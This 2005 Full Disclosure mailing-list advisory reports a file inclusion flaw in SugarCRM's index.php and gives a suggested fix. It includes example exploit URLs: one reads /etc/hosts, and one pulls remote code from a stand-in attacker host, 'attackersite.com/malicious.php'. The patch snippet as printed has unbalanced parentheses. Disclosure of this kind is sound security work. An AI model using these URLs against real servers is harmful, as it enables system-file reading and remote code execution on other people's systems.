Full Disclosure mailing list archives
Arbitrary file inclusion in SugarCRM [PHP]
From: Santiago Cortes <blindot () gmail com>
Date: Thu, 6 Jan 2005 16:46:41 -0500
------------------------------------------------------------ Arbitrary File Inclusion in SugarCRM ------------------------------------------------------------ Author: Santiago Cortés Date: Jan 06, 2005 ------------------------------------------------------------ Vulnerability: Failure to sanitize user input in index.php opens the possibility for an attacker to include an arbitrary file when PHP's "register_globals" is on. Example: http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=/etc/hosts http://www.sugarsales.com/index.php?module=Home&moduleDefaultFile[Home]=http://www.attackersite.com/malicious.php Fix: Disable register_globals in your php.ini file, or Replace line 198 in index.php: $currentModuleFile = $moduleDefaultFile[$currentModule]; With if ( !isset($moduleDefaultFile[$currentModule] ) { die('No action specified'); } $currentModuleFile = $moduleDefaultFile[$currentModule]; Disclaimer: The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Contact: Santiago Cortés blindot --at-- gmail _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Arbitrary file inclusion in SugarCRM [PHP] Santiago Cortes (Jan 06)